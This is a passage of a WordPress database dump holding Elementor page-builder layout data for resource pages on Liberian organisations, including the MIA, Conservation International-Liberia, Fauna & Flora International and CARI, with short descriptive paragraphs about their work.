More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9021,1608,'_dp_original','1606'),(9022,1608,'_edit_last','42'),(9024,1610,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(9025,1610,'slide_template','default'),(9027,1610,'_elementor_template_type','wp-post'),(9028,1610,'_elementor_version','2.7.5'),(9029,1610,'_wp_page_template','default'),(9030,1610,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3cd232e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"58747a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4bd205e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b1b1970\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mia\\\",\\\"tag_id\\\":\\\"59\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mia\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"177453a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"182afa84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"375dd5cc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"78a5b2a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mia\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9031,1610,'_dp_original','1608'),(9032,1610,'_edit_last','42'),(9034,1612,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(9035,1612,'slide_template','default'),(9037,1612,'_elementor_template_type','wp-post'),(9038,1612,'_elementor_version','2.7.5'),(9039,1612,'_wp_page_template','default'),(9040,1612,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9041,1612,'_dp_original','1610'),(9042,1612,'_edit_last','42'),(9044,1614,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(9045,1614,'slide_template','default'),(9047,1614,'_elementor_template_type','wp-post'),(9048,1614,'_elementor_version','2.7.5'),(9049,1614,'_wp_page_template','default'),(9050,1614,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9052,1614,'_dp_original','1612'),(9053,1614,'_edit_last','42'),(9239,1592,'_edit_lock','1663165204:42'),(9240,1616,'_elementor_controls_usage','a:0:{}'),(9241,1616,'_elementor_edit_mode','builder'),(9242,1616,'_elementor_template_type','wp-post'),(9243,1616,'_elementor_version','2.7.5'),(9244,1616,'_wp_page_template','default'),(9245,1616,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"CARI Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\